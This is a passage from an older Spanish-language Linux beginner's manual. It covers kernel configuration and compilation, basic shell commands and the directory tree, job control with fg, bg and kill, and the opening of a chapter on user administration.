Si los fuentes que posee son superiores al 2.0.x, existen dos metodos
bastante mas agradables e interactivos de llevar a cabo la configuracion;
invocando desde modo texto, en el mismo directorio mencionado anteriormente
make menuconfig
Iniciar un colorido programa muy agradable y bastante mas funcional
que el make config a secas, para llevar a cabo la configuracion del kernel.
Observar que su uso es bastante intuitivo; las opciones con un < >
indican la posibilidad de modularizar; si en ella presionamos M la
seleccionaremos como modulo. Si presionamos ESPACIO aparecer un * indicando
que ser incluido en el kernel. Finalmente, si presionamos N lo
deseleccionaremos.
Las opciones marcadas con [ ] no son modularizables.
Si Vd. es un fan de las X, entonces puede arrancar desde un xterm el
script equivalente, ejecutando
make xconfig
Supongo (porque siempre lo ice con make menuconfig) que aparecer ante
sus ojos un maravilloso y grafico programa de seleccion y configuracion del
kernel bajo X Window .
A continuacion describire las opciones que creo son mas importantes a
tener en cuenta al momento de compilar de todos modos las que aqui no este
comentadas y Ud. Desee conocer cualquiera de los metodos de configuracion
usados tendra un acceso a ayuda.
Emulacion de coprocesador (kernel math emulation): Si no tiene
coprocesador matematico debe contestar `y' a esto. Si tiene coprocesador y
contesta `y' la emulacion ser instalada pero no usada; funcionar , pero le
ocupar memoria innecesariamente. Ademas, he oido que la emulacion es lenta,
lo que se traducir en unas pesadas X-Window.
Soporte de discos IDE y MFM/RLL: Normalmente necesitar este soporte,
pues es el de los discos habituales en los PCs. Este manejador no gestiona
discos SCSI, para eso esta la opcion especifica que luego veremos. Ahora se
le preguntar si quiere usar ``old disk-only'' y manejadores ``new IDE''.
Tiene que elegir uno de ellos. La diferencia principal es que el nuevo (new
IDE) maneja controladoras secundarias y CD-ROMs IDE/ATAPI, hasta cuatro
dispositivos, pero ocupa 4 KB mas que el antiguo. Se supone que los nuevos
manejadores mejoran tambien velocidad y fiabilidad, en especial si dispone
de dispositivos EIDE.
Soporte de redes (networking support): En principio, contestaria
afirmativamente si la maquina estuviera en una red local o conectada a la
Internet con SLIP/PPP. Sin embargo, muchos programas, como ocurre con el
sistema XWindow, requieren el soporte de red, asi que lo mejor es contestar
`y' siempre. Despues se le preguntar si quiere soporte TCP/IP: conteste
afirmativamente aun no estando seguro.
Limitar memoria a 16 Mb (Limit memory to low 16MB)
Hay controladores de DMA en 386 con problemas para direccionar mas de
16 MB de RAM. Conteste `y' en el caso (raro) de que tenga uno de estos.
Comunicacion entre procesos System V (System V IPC): Sinceramente no
se bien lo que es pero lei que no es recomendable desactivarlo.
Tipo de procesador (Processor type): Deber elegir siempre la CPU que
tenga (aunque la versi¢n de 386 funcionar en todas las maquinas).
Soporte SCSI (SCSI support): Si tiene dispositivos SCSI, conteste
`y'. Se le preguntaran entonces mas cosas: soporte de CD-ROM, discos y que
clase de adaptador utiliza.
Soportes de tarjetas de red (Network device support): Si tiene
tarjeta de red, o quiere usar PPP, SLIP o PLIP (puerto paralelo usado para
conectarse a Internet), conteste afirmativamente. El script le preguntara
ahora que tarjeta tiene y que protocolo usar.
Sistemas de ficheros (Filesystems): El programa le preguntara si
quiere soporte para los siguientes sistemas de ficheros:
* Standard (minix) - Las nuevas distribuciones no crean sistemas Minix, y
mucha gente no las usa para nada, pero puede convenir elegirla. Algunos
``discos de rescate'' usan el sistema Minix como formato de sus disquetes,
ya que da menos problemas.
* Extended fs - Fue la primera version del sistema extendido, pero ya no se
usa. No necesita seleccionarla.
* Second extended - Este es el sistema mas usado. Seguramente lo usara Vd.
tambien. Seleccione `y'. (Ojo con seleccionarlo como modulo; aunque se
puede, el sistema de ficheros en el que este su partici¢n "/" debe estar
incluido el kernel no-modularmente, ya que de lo contrario no podra
arrancar.)
* xiafs filesystem - Hace mucho pudo ser usado, pero ahora mismo no.
* msdos - Seleccionelo si quiere acceder desde Linux a sus particiones de
MS-DOS o quiere montar disquetes de ese sistema.
* umsdos - Este sistema permite añadir a un sistema MS-DOS las
caracteristicas tipicas de Unix como nombres largos o enlaces. Sirve para
quienes quieran instalar Linux en la particion DOS, pero nada mas.
* /proc - (una idea robada descaradamente a Bell Labs, si no me equivoco)
No se trata de algo que se guarde en el disco, sino de una interfaz por
medio de ficheros con la tabla de procesos del nucleo, usada por
programas como `ps'. Pruebe a teclear `cat /proc/meminfo' o
`cat /proc/devices'. Algunos shells (rc, concretamente) hacen uso de
/proc/self/fd (en lugar de /dev/fd) para E/S. Debe contestar
afirmativamente a la pregunta: muchas utilidades de Linux lo necesitan.
* NFS - Si su maquina esta en red y quiere acceder a sistemas de ficheros
remotos con NFS, conteste `y' a esta pregunta.
* ISO9660 - Tipico en los CD-ROMs. Si tiene un CD-ROM, seleccione esta
opcion.
* OS/2 HPFS - Para acceder a disco de OS/2. En el momento de escribir esto,
el soporte HPFS es de solo lectura.
* System V and Coherent - para particiones de sistemas Coherent y System V
(otras variantes de Unix para PC). Conteste "no".
* quota support - Seleccionelo si quiere administrar el espacio que
consumen en disco los usuarios del sistema.
* vfat - En conjuncion con el sistema de fichero fat o msdos nos permitira
acceso a las particiones de w95, con soporte de nombres ``largos'' y
demas. En el momento de escribir esto, se desconoce si soportar la
``nueva'' fat32 del w95-OSR2.
* SMB filesystem support - En conjuncion con el paquete samba nos permitir
montar volumenes compartidos por clientes de red NetBios.
* SMB w95 bug workaround - Corrije un bug que experimentan los volumenes
exportados por servidores w95.
* Amiga FFS support - Soporte para el sistema de ficheros Fast File System
de Amiga.
* UFS filesystem support - Soporte para el Unix FileSystem, empleado por
algunos Unix BSD, como SunOS, FreeBSD, NetBSD, NeXTstep. Permite montar
dichas particiones o disquetes en modo de solo lectura.
* NCP filesystem support - Permite montar volumenes NetWare. Necesitar
programas cliente para llevarlo a cabo.
Pero. ®que sistemas de ficheros necesito! Teclee `mount'. La salida
ser como esta:
blah# mount
/dev/hda1 on / type ext2 (defaults)
/dev/hda3 on /usr type ext2 (defaults)
none on /proc type proc (defaults)
/dev/fd0 on /mnt type msdos (defaults)
Observe cada linea; la palabra que sigue a `type' es el tipo de
sistema usado. En este ejemplo, los sistemas raiz (/) y /usr usan el
sistema ``second extended'', ademas usamos sistema ``proc'' y hay montado
un disquete MS-DOS.
Para saber que sistemas de ficheros usa en el nucleo actual puede
teclear `cat /proc/filesystems' siempre y cuando tenga al menos soporte
proc.
Manejadores de tipo caracter (Character devices): Aqui se activan los
manejadores para impresoras (por puerto paralelo), ratones de bus, ratones
PS/2 (usado tambien en muchos trackballs de los portatiles), algunos
manejadores de cintas y otros. Conteste segun su hardware.
Placa de sonido (Sound card): Si tiene placa de sonido conteste `y' y
despues otro programa de configuracion le preguntara acerca de la tarjeta
de sonido que tiene. Aqui es importante saber el puerto E/S, la IRQ, DMA de
nuestra placa de Sonido.
Otras opciones de configuracion: No todas las opciones se han listado
ya que cambian mucho y otras son completamente evidentes (por ejemplo, el
soporte 3Com 3C509).
Kernel hacking: Traduccion del fichero README de Linus: La
configuraci¢n ``kernel hacking'' suele dar lugar a un nucleo mas grande y/o
lento, y puede hacerlo menos estable al configurar algunas rutinas
especiales para encontrar errores del nucleo. Deber contestar `n' a la
pregunta.
El archivo Makefile
Tras hacer make config, un mensaje le dira que ya esta preparado el
kernel y que "revise el fichero Makefile para opciones adicionales".
Por tanto, veamos el Makefile. Probablemente no tendra que cambiar
nada, pero debe mirarse. Sus opciones podran cambiarse con el comando
"rdev" una vez que el kernel este compilado.
Compilacion del Kernel
Limpieza y dependencias
Cuando se termina de configurar debe ejecutar "make dep" y "make
clean. Haga `make dep', lo que preparar las dependencias en poco tiempo, a
menos que su PC sea muy lento. Cuando acabe, haga "make clean". Esto
elimina ficheros objetos y demas de la version anterior. No olvidar este
paso.
La compilacion
Despues de preparar dependencias, puede ejecutar "make zImage"(esta
es la parte que tarda mas tiempo). `make zImage' compilar el nucleo y lo
dejar comprimido en el subdirectorio arch/i386/boot/zImage junto a otros
ficheros. La "z" inicial indica que el lo que obtenemos es una imagen
comprimida del kernel, se descomprime automaticamente al ser ejecutado.
Compilacion de Modulos
Las ordenes make modules; make modules_install compilaran los modulos
que hayamos seleccionado, y los instalaran. No olvidar ejecutar depmod -a
en cuanto hayamos arrancado con dicho nucleo.
Instalacion del Kernel nuevo
La instalacion se hara en el directorio "/boot" si lo que instalamos
es RedHat, en otro caso se la hace en "/". Veamos ahora como hacer esto:
cd arch/i386/boot
chmod 400 zImage
rdev -R zImage 1
cp zImage /boot/nuevokernel
Solo nos resta retocar el archivo lilo.conf que se encuentra en el
directorio /etc.
#CAPITULO IV
USO
Conceptos basicos preliminares
Para entender mejor Linux muchas veces haremos comparaciones con DOS,
asi que aqui van algunas consideraciones acerca de MS-DOS o Linux. Muchos
usuarios de Linux confian en MS-DOS para aplicaciones tales como
procesadores de texto. Aunque Linux proporciona sus propios an logos para
estas aplicaciones (por ejemplo, TEX), existen varias razones por las que
un usuario concreto desearia correr tanto MS-DOS como Linux. Hay muchas
aplicaciones comerciales para MS-DOS que no estan disponibles tidavia para
Linux, y no hay ninguna razon por la que no pueda usar ambos.
Como puede saber, MS-DOS no utiliza completamente la funcionalidad de
los procesadores 80386 y 80486. Por otro lado, Linux corre completamente en
el modo protegido del procesador y explota todas las caracteristicas del
este. Puede acceder directamente a toda su memoria disponible (e incluso
mas haya de la disponible, usando RAM virtual). Linux proporciona un
interface UNIX completo no disponible bajo MS-DOS el desarrollo y
adaptacion de aplicaciones UNIX bajo Linux es cosa facil, mientras que,
bajo MS-DOS, Ud. esta limitado a un pequeño subgrupo de la funcionalidad de
programacion UNIX. Al ser Linux un verdadero sistema UNIX, Ud. no tendria
estas limitaciones.
Podriamos debatir los pros y contras de MS-DOS y Linux durante
paginas y paginas. Sin embargo, baste decir que Linux y MS-DOS son
entidades completamente diferentes. MS-DOS no es caro (comparado con otros
sistemas operativos comerciales), y tiene un fuerte asentamiento en el
mundo de los PC's. Ningun otro sistema operativo para PC ha conseguido el
nivel de popularidad de MS-DOS, basicamente porque el coste de esos otros
sistemas operativos es inaccesible para la mayoria de los usuarios de PCs.
Muy pocos usuarios de PC pueden imaginar pagar lo que cuesta por ejemplo un
Solaris. Linux, sin embargo, es gratis.
Podra emitir sus propios juicios de Linux y MS-DOS basados en sus
expectativas y necesidades. Linux no esta destinado a todo el mundo.
Este capitulo no presentara gran cantidad de detalles ni cubriria
temas muy avanzados. Sino que esta pensado para permitir al nuevo usuario
de Linux comenzar a usar el sistema y situarlo en una posicion en la que
pueda leer libros mas generales sobre UNIX y entender las diferencias
basicas entre otros sistemas UNIX y Linux.
A primera vista, UNIX parece como MS-DOS (despues de todo, partes de
MS-DOS fueron tomadas de CP/M, el cual fue a su vez inspirado en UNIX
incluso muchas de las novedades que Windows 95 pretende presentar son
caracteristicas de los sistemas UNIX). Pero, solo las caracteristicas
superficiales de UNIX se parecen a MS-DOS.
Como ya dijimos, Linux es un sistema operativo multitarea y
multiusuario. Bajo UNIX, para que los usuarios puedan identificarse en el
sistema, deben registrarse (login), proceso que consta de dos pasos:
Introducir el nombre de usuario (login) (el nombre con que ser
identificado por el sistema), y una palabra clave o contraseña (password),
la cual es su llave personal secreta para entrar en la cuenta. Como solo
usted conoce su palabra clave, nadie mas podra logearse en el sistema con
su nombre de usuario. Por esto es muy importante tomarse unos minutos para
elegir una palabra clave que no sea facil de adivinar o desencriptar, es
comun en los novatos usar palabras claves que tiene algo que ver con ellos,
por ejemplo el nombre de la esposa, madre, hija, fecha de nacimiento,
numero de documento, hasta el nombre de su mascota, de esta manera los
hacker usan diccionarios con (por ejemplo) nombres comunes de mascotas para
lograr adivinar claves de usuarios desprevenidos.
En los sistemas UNIX tradicionales, el administrador del sistema
asignara el nombre de usuario y una palabra clave inicial en el momento de
crear la cuenta de usuario.
Ademas, cada sistema UNIX tiene un nombre del sistema (hostname. Este
"hostname" le da nombre a la maquina, ademas de caracter y encanto, por
ejemplo la mia se llama Tesla, la anterior fue Newton y la anterior
Leonardo. El nombre del sistema es usado para identificar maquinas en una
red, pero incluso aunque la maquina no este en red, deberia tener un nombre.
Antes de poder usar el sistema, deber crear una cuenta de usuario.
Esto es necesario porque no es buena idea usar la cuenta de root para los
usos normales. La cuenta de root deberia reservarse para el uso de comandos
privilegiados y para el mantenimiento del sistema.
Shells
La forma de comunicarse entre el S.O., el hardware y el usuario es un
Shell, en Linux, el mas difundido es "bash" que significa "Bourne again
shell" aunque existen varios shells para todos los gustos. En la mayoria de
las exploraciones en el mundo de UNIX, estar hablando con el sistema a
traves del uso de un shell. Un shell es simplemente un programa que toma la
entrada del usuario (ej. las ordenes que teclea) y las traduce a
instrucciones. Esto puede ser comparado con el COMMAND.COM de MS-DOS o el
4DOS para los mas exquisitos, los cuales efectuan esencialmente la misma
tarea. El shell es solo uno de los interfaces con UNIX hay muchos
interfaces posibles como el sistema X Windows, el cual le permite ejecutar
comandos usando el raton y el teclado.
Antes de continuar, deberiamos ver como salir del sistema. Desde la
linea de comandos usaremos la orden "exit" para salir. Hay otras formas,
pero esta es la mas facil.
Directorios
La mayoria de los sistemas UNIX tienen una distribucion de ficheros
estandar, de forma que recursos y ficheros puedan ser facilmente
localizados. Esta distribucion forma el arbol de directorios, el cual
comienza en el directorio "/", tambien conocido como "directorio raiz".
Directamente por debajo de "/" hay algunos subdirectorios importantes:
/bin, /etc, /dev y /usr, entre otros. Estos a su vez contienen otros
directorios con ficheros de configuracion del sistema, programas, etc. En
particular, cada usuario tiene un directorio "home". Este es el directorio
en el que el usuario guardara sus archivos. Usualmente, los directorios
home de los usuarios cuelgan de /home y son nombrados con el nombre del
usuario al que pertenecen.
El siguiente es un ejemplo de arbol de directorios en linux.
/________bin
|
|__dev
|
|__etc
|
|__home_______juan
| |
| |__pedro
|__lib
|
|__proc
|
|__tmp
|
|__usr_______X386
|
|__bin
|
|__emacs
|
|__etc
|
|__g++-include
|
|__include
|
|__lib
|
|__local_______bin
| |
| |__emacs
| |
| |__etc
| |
| |__lib
|
|__man
|
|__spool
|
|__src_______linux
|
|__tmp
Comandos Basicos
Antes de comenzar es importante destacar que todos los nombres de
ficheros y comandos son "case-sensitive" (que hacen diferencia entre
mayusculas y minusculas, a diferencia de sistemas operativos como MS-DOS).
Por ejemplo, el comando make es diferente a Make o MAKE. Lo mismo ocurre en
el caso de nombres de ficheros o directorios.
Cambio de directorio:
La orden para movernos por la estructura de directorios es cd,
abreviacion de "cambio de directorio". Hay que destacar, que la mayoria de
las ordenes UNIX mas usadas son de dos o tres letras.
La forma de uso de la orden cd es:
cd <directorio>
donde <directorio> es el nombre del directorio al que queremos ir. Si
usamos cd sin par metros esto no llevara a nuestro directorio. Tenemos
tambien dos puntero uno al directorio padre ".." y otro a si mismo "." Esto
tambien fue copiado por DOS.
Consultar el directorio actual
Para saber en que directorio no escontramos usaremos el comando "pwd"
Consultar el contenido de los directorios
Una vez que podemos navegar por nuestro arbol de directorio lo mas
importantes es poder ver que tenemos en cada uno. Para eso usaremos el
comando "ls", ls vendria a ser "dir" del DOS, pero como vernos mas adelante
es mucho mas poderoso como todos los comandos de Linux. Ls tiene muchos
parametros que van a afectar su comportamiento a todos pero el mas usado
sin duda ser "-l" que no mostrara con mas detalle el contenido del
directorio.
Consultar las paginas del manual
En este momento creo que uno de los comandos que mas nos van a ayudar
en el aprendizaje de Linux es "man" que siguiendo con las comparaciones con
el DOS vendria a ser el "help" con man podremos solicitar informacion de
todos los comandos e incluso algunos programas y aplicaciones tiene sus
propias paginas de manual. En mi experiencia personal man me ayudo mas
veces que cualquier libro.
La forma de usarlo es:
man <comando>
Creacion de directorios:
Para esto usaremos el comando "mkdir" como en DOS seguido del nombre
del directorio a crear.
mkdir <nombre>
Copiado de archivos
La orden "cp" copia los ficheros listados en la linea de comandos al
fichero o directorio pasado como ultimo argumento. Notese como se usa el
directorio "." para referirnos al directorio actual.
cp <origen> <destinod>
Mover archivos
Tanto para mover como para renombrar archivos o directorio usaremos
el comando "mv" de identica manera a "cp" solo que en esta caso no se
preservara el origen.
mv <origen> <destinod>
Borrado de archivos
Para borrar se usa "rm" que viene de remove. Se usa con un parametro
que es el nombre del fichero a borrar o una lista de ellos. Tambien lo
podemos usar para borrar directorios completos con el parametro "-r" a hay
que ser muy prudente y cuidadoso con este comando ya que podemos hacer
macanas.
rm <nombre de archivo o directorio>
Mirando los ficheros
Las ordenes "more", "cat" y "less" son usadas para ver el contenido
de ficheros. More y less muestran el fichero pantalla a pantalla mientras
que cat lo muestra entero de una vez.
more <archivo>
less <archivo>
cat <archivo>
El sistema de ficheros es la coleccion de ficheros y la jerarquia de
directorios de su sistema.
Primero cambie al directorio raiz (cd /) y ejecute ls -F.
Probablemente vera estos directorios:
bin, dev, etc, home, install, lib, mnt, proc, root, tmp, user, usr, y var.
La distribucion de directorios y archivos es Unix es muy ordenada y
distinta que en DOS, veamos para que usamos cada directorio.
Directorio
Contenido
/bin
/bin Es la abreviacion de "binaries", o ejecutables. Es donde residen la
mayoria de los programas esenciales del sistema.
/dev
/dev Los "ficheros" en /dev son conocidos como controladores de dispositivo
(device drivers)_son usados para acceder a los dispositivos del
sistema y recursos, como discos duros, modems, memoria, etc
/etc
/etc Contiene una serie de ficheros de configuracion del sistema. Estos
incluyen /etc/passwd (la base de datos de usuarios), /etc/rc (guiones
de inicializacion del sistema), etc.
/sbin
/sbin Se usa para almacenar programas esenciales del sistema, que usara el
administrador del sistema.
/home
/home Contiene los directorios "home" de los usuarios. Por ejemplo,
/home/juan es el directorio del usuario "juan".
/lib
/lib Contiene las imagines de las librerias compartidas. Estos ficheros
contienen codigo que compartirian muchos programas.
/proc
/proc Es un "sistema de ficheros virtual". Los ficheros que contiene
realmente residen en memoria, no en un disco. Hacen referencia a
varios procesos que corren en el sistema, y le permiten obtener
informacion acerca de que programas y procesos estan en ejecucion.
/usr
/usr Es un directorio muy importante. Contienen una serie de subdirectorios
que contienen a su vez algunos de los mas importantes y utiles
programas y ficheros de configuracion usados en el sistema.
/usr/X386
/usr/X386 Contiene todos los ejecutables de X Window, ficheros de
configuracion y de soporte.
/usr/bin
/usr/bin Es el deposito real de programas del sistema UNIX. Contiene la
mayoria de los programas que no se encuentran en otras partes como
/bin.
/usr/include
/usr/include Contiene los ficheros de cabecera para el compilador de C.
Estos ficheros (la mayoria de los cuales terminan en .h, de
"header") declaran estructuras de datos, subrutinas y
constantes usados en la escritura de programas en C. Los
ficheros que se encuentran en /usr/include/sys son
generalmente usados en la programacion de en UNIX a nivel de
sistema. Si esta familiarizado con el lenguaje de programacion
C, aqui encontrara los ficheros de cabecera como stdio.h, el
cual declara funciones como printf().
/usr/local
/usr/local Es el directorio donde normalmente pondremos nuestras
aplicaciones.
/usr/src
/usr/src Contiene el codigo fuente (programas por compilar) de varios
programas de su sistema. El mas importante es /usr/src/linux, el
cual contiene el codigo fuente del kernel de Linux.
/var
/var Contiene directorios que a menudo cambian su tamaño o tienden a
crecer. Muchos de estos directorios solian residir en /usr, por
ejemplo en /var/adm encontraremos varios ficheros de interes para el
administrador del sistema, especificamente hist¢ricos del sistema, los
cuales recogen errores o problemas con el sistema.
#Capitulo V
Control de Tareas
Tareas y procesos
Control de Tareas es una utilidad incluida en muchos shells
(incluidas Bash y Tcsh), que permite el control de multitud de comandos o
tareas al momento. Antes de seguir, deberemos hablar un poco sobre los
procesos.
Cada vez que usted ejecuta un programa, usted lanza lo que se conoce
como proceso, que es simplemente el nombre que se le da a un programa
cuando se esta ejecutando. El comando ps visualiza la lista de procesos que
se estan ejecutando actualmente, por ejemplo:
/home/jperez# ps
PID TT STAT TIME COMMAND
24 3 S 0:03 (bash)
161 3 R 0:00 ps
La columna PID representa el identificador de proceso. La ultima
columna COMMAND, es el nombre del proceso que se esta ejecutando. Ahora
solo estamos viendo los procesos que esta ejecutando jperez. Vemos que hay
dos procesos, bash (Que es el shell o interprete de comandos que usa
jperez), y el propio comando ps. Como puede observar, bash se ejecuta
concurrentemente con el comando ps. Bash ejecuto ps cuando jperez tecleo el
comando. Cuando ps termina de ejecutarse (despues de mostrar la tabla de
procesos), el control retorna al proceso bash, que muestra el prompt,
indicando que esta listo para recibir otro comando. Un proceso que esta
corriendo se denomina tarea para el shell. Los terminos proceso y tarea,
son sinonimos. Sin embargo, se suele denominar "tarea" a un proceso, cuando
es usado en conjuncion con control de tareas, que es un rasgo del shell que
permite cambiar entre distintas tareas.
Hay muchos mas procesos aparte de estos corriendo en el sistema, para
verlos todos, teclearemos el comando "ps -aux".
En muchos casos, los usuarios solo ejecutan un trabajo cada vez, que
es el ultimo comando que ellos teclearon desde el shell. Sin embargo,
usando el control de tareas, usted podra ejecutar diferentes tareas al
mismo tiempo, cambiando entre cada uno de ellos conforme lo necesite.
Supongamos que esta usando un procesador de textos, y de repente necesita
parar y realizar otra tarea, con el control de tareas, usted podria
suspender temporalmente el editor, y volver al shell para realizar
cualquier otra tarea, y luego regresar al editor como si no lo hubiese
dejado nunca. Lo siguiente solo es un ejemplo, hay montones de usos
practicos del control de tareas.
Primer plano y Segundo plano
Un proceso puede estar en Primer plano o en Segundo plano
(background). Solo puede haber un proceso en primer plano por vez, el
proceso que esta en primer plano, es el que interactua con usted, recibe
entradas de teclado, y envia las salidas al monitor. (Salvo, por supuesto,
que haya redirigido la entrada o la salida. El proceso en segundo plano, no
recibe ninguna señal desde el teclado por lo general, se ejecutan en
silencio sin necesidad de interaccion.
Algunos programas necesitan mucho tiempo para terminar, y no hacen
nada interesante mientras tanto. Compilar programas es una de estas tareas,
asi como comprimir un fichero grande. No tiene sentido que se siente y se
aburra mientras estos procesos terminan. En estos casos es mejor lanzarlos
en segundo plano, para dejar el ordenador en condiciones de ejecutar otro
programa.
Los procesos pueden ser suspendidos. Un proceso suspendido es aquel
que no se esta ejecutando actualmente, sino que esta temporalmente parado.
Despues de suspender una tarea, puede indicar a la misma que continue, en
primer plano o en segundo, segun necesite. Retomar una tarea suspendida no
cambia en nada el estado de la misma la tarea continuara ejecutandose justo
donde se dejo.
Tenga en cuenta que suspender un trabajo no es lo mismo que
interrumpirlo. Cuando usted interrumpe un proceso (generalmente con la
pulsaci¢n de |ctrl-C|, el proceso muere, y deja de estar en memoria y
utilizar recursos del ordenador. Una vez eliminado, el proceso no puede
continuar ejecutandose, y deber ser lanzado otra vez para volver a realizar
sus tareas. Tambien se puede dar el caso de que algunos programas capturan
la interrupcion, de modo que pulsando |ctrl-C| no se para inmediatamente.
Esto se hace para permitir al programa realizar operaciones necesarias de
limpieza antes de terminar. De hecho, algunos programas simplemente no se
dejan matar por ninguna interrupci¢n.
Envio a segundo plano y eliminacion procesos
Empecemos con un ejemplo sencillo. El comando yes es un comando
aparentemente inutil que envia una serie interminable de y-es a la salida
estandar. (En realidad es muy util. Si se utiliza una tuberia (o "pipe")
para unir la salida de y-es con otro comando que haga preguntas del tipo
si/no, la serie de y-es confirmaria todas las preguntas.)
/home/jperez# yes
y
y
y
y
y |ctrl-C|
La serie de y-es continuara hasta el infinito, a no ser que usted la
elimine, pulsando la tecla de interrupcion. Tambien puede deshacerse de
esta serie de y-es redigiriendo la salida estandar de yes hacia /dev/null,
que es como una especie de "agujero negro" o papelera para los datos. Todo
lo que usted envie alli, desaparecer: /home/jperez# yes > /dev/null. Ahora
va mucho mejor, el terminal no se ensucia, pero el prompt de la shell no
retorna. Esto es porque yes sigue ejecutandose y enviando esos inutiles
y-es a /dev/null. Para recuperarlo, pulse la tecla de interrupcion.
Supongamos ahora que queremos dejar que el comando yes siga
ejecutandose, y volver al mismo tiempo a la shell para trabajar en otras
cosas. Para ello enviaremos a yes a segundo plano, lo que nos permitir
ejecutarlo, pero sin necesidad de interaccion.
Una forma de mandar procesos a segundo plano es añadiendo un caracter
"&" al final de cada comando.
/home/jperez# yes > /dev/null &
[1] 164
Como podra ver, ha regresado a la shell. ®Pero que es eso de
"[1] 164"?, ®Se esta ejecutando realmente el comando yes?. "[1]" representa
el numero de tarea del proceso yes. La shell asigna un numero a cada tarea
que se este ejecutando. Como yes es el unico comando que se esta ejecutando,
se le asigna el numero de tarea 1. El numero "164" es el numero de
identificacion del proceso, o PID, que es el numero que el sistema le
asigna al proceso. Ambos numeros pueden usarse para referirse a la tarea
como veremos despues.
Ahora usted tiene el proceso yes corriendo en segundo plano, y
enviando constantemente la señal y hacia el dispositivo /dev/null. Para
chequear el estado del proceso, utilice el comando interno de la shell
jobs:
/home/jperez# jobs
[1]+ Running yes >/dev/null &
Tambien puede usar el comando ps, como mostramos antes, para
comprobar el estado de la tarea.
Para eliminar una tarea, utilice el comando kill. Este comando toma
como argumento un numero de tarea o un numero de ID de un proceso. Esta era
la tarea 1, asi que usando el comando
/home/jperez# kill %1
matar la tarea. Cuando se identifica la tarea con el numero de tarea,
se debe preceder el numero con el caracter de porcentaje ("%").
Ahora que ya hemos matado la tarea, podemos usar el comando jobs de
nuevo para comprobarlo:
/home/jperez# jobs
[1]+ Terminated yes >/dev/null
La tarea esta , en efecto, muerta, y si usa el comando jobs de nuevo,
no mostrar nada.
Tambien podra matar la tarea usando el numero de ID de proceso (PID),
el cual se muestra conjuntamente con el ID de tarea cuando arranca la misma.
En nuestro ejemplo el ID de proceso es 164, asi que el comando
/home/jperez# kill 164
es equivalente a
/home/jperez# kill %1
No es necesario usar el "%" cuando nos referimos a una tarea a traves
de su ID de proceso.
Detencion o parada y relanzamiento de tareas
Hay otra manera de poner una tarea en segundo plano. Usted puede
lanzarlo como un proceso normal (en primer plano), pararlo, y despues
relanzarlo en segundo plano.
Primero, lance el proceso yes en primer plano como lo haria
normalmente:
/home/jperez# yes > /dev/null
De nuevo, dado que yes corre en primer plano, no debe retornar el
prompt de la shell.
Ahora, en vez de interrumpir la tarea con |ctrl-C|, suspenderemos la
tarea. El suspender una tarea no la mata: solamente la detiene
temporalmente hasta que Ud. la retoma. Para hacer esto usted debe pulsar la
tecla de suspender, que suele ser |ctrl-Z|.
/home/jperez# yes > /dev/null
|ctrl-Z|
[1]+ Stopped yes >/dev/null
/home/jperez#
Mientras el proceso esta suspendido, simplemente no se esta
ejecutando. No gasta tiempo ni recursos del sistema en la tarea. Sin
embargo, usted puede retomar el proceso de nuevo como si nada hubiera
pasado. Continuara ejecutandose donde se dejo. Para relanzar la tarea en
primer plano, use el comando fg (del ingles "foreground").
/home/jperez# fg yes >/dev/null
La shell muestra el nombre del comando de nuevo, de forma que tenga
conocimiento de que tarea es la que ha puesto en primer plano. Pare la
tarea de nuevo, con |ctrl-Z|. Esta vez utilice el comando bg para poner la
tarea en segundo plano. Esto hara que el comando siga ejecutandose igual
que si lo hubiese hecho desde el principio con "&"
/home/jperez# bg
[1]+ yes >/dev/null &
/home/jperez#
Y tenemos de nuevo el prompt. El comando jobs deberia decirnos que
yes se esta ejecutando, y podemos matar la tarea con kill tal y como lo
hicimos antes.
Como podemos parar la tarea de nuevo? Si pulsa |ctrl-Z| no
funcionara, ya que el proceso est en segundo plano. La respuesta es poner
el proceso en primer plano de nuevo, con el comando fg, y entonces pararlo.
Como puede observar podr usar fg tanto con tareas detenidas, como con las
que esten segundo plano.
Hay una gran diferencia entre una tarea que se encuentra en segundo
plano, y una que se encuentra detenida. Una tarea detenida es una tarea que
no se esta ejecutando, es decir, que no usa tiempo de CPU, y que no esta
haciendo ningun trabajo (la tarea aun ocupa un lugar en memoria, aunque
puede ser volcada a disco). Una tarea en segundo plano, se esta ejecutando,
y usando memoria, a la vez que completando alguna accion mientras usted
hace otro trabajo. Sin embargo, una tarea en segundo plano puede intentar
mostrar texto en su terminal, lo que puede resultar molesto si esta
haciendo hacer otra cosa. Por ejemplo, si usted uso el comando
/home/jperez# yes &
sin redirigir stdout a /dev/null, una cadena de y-es se mostrar en su
monitor, sin que pueda interrumpirlo (no puede hacer uso de |ctrl-C| para
interrumpir tareas en segundo plano). Para poder parar esas interminables
y-es, tendria que usar el comando fg para pasar la tarea a primer plano, y
entonces usar |ctrl-C| para matarla. Otra observacion. Normalmente, los
comandos "fg" y "bg" actuan sobre el ultimo proceso parado (indicado por un
"+" junto al numero de tarea cuando usa el comando jobs). Si usted tiene
varios procesos corriendo a la vez, podria mandar a primer o segundo plano
una tarea especifica indicando el ID de tarea como argumento de fg o bg,
como en /home/jperez# fg %2 (para la tarea de primer plano numero 2), o
/home/jperez# bg %3
(Para la tarea de segundo plano numero 3). No se pueden usar los ID
de proceso con fg o bg. Ademas de esto, si usa el numero de tarea por si
solo, como /home/jperez# %2
es equivalente a
/home/jperez# fg %2
Solo queda recordarle que el uso de control de tareas es una utilidad
de la shell. Los comandos fg, bg y jobs son internos de la shell. Si por
algun motivo usted utiliza una shell que no soporta control de tareas, no
espere disponer de estos comandos. Y ademas, hay algunos aspectos del
control de tareas que difieren entre Bash y Tcsh. De hecho, algunas shells
no proporcionan ningun control de tareas sin embargo, la mayoria de las
shells disponibles para Linux soportan control de tareas.
#CAPITULO VI
Administracion de Usuarios
Este es uno de los temas mas importantes para quien ser el
administrador del sistema. Gran parte de la seguridad del sistema depender
de la correcta administracion y control de los usuarios, el administrador
puede tomar dos posturas incorrectas a la hora de proteger el sistema una
seria el exceso de celo en el cuidado lo que muchas veces va a resultar
molesto a los usuarios y la otra es ser muy confiado lo que seguro va a
traer complicaciones con los usuarios experimentados, la postura que yo
recomiendo el una intermedia. Administrar un sistema es algo asi como
cuidar la novia o esposa. Independientemente de que tenga muchos usuarios o
no en su sistema, es importante comprender los aspectos de la gestion de
usuarios bajo Linux. Incluso si se es el unico usuario, se debe tener,
presumiblemente, una cuenta distinta de root para hacer la mayor parte del
trabajo.
Cada persona que utilice el sistema debe tener su propia cuenta. Es
una malisima idea el que varias personas compartan la misma cuenta. No solo
es un problema de seguridad, sino que las cuentas se utilizan para
identificar univocamente a los usuarios del sistema. Se necesita ser capaz
de saber quien esta haciendo que en cada momento que queramos.
Usuario: podriamos definir como usuario a cada persona que pueda
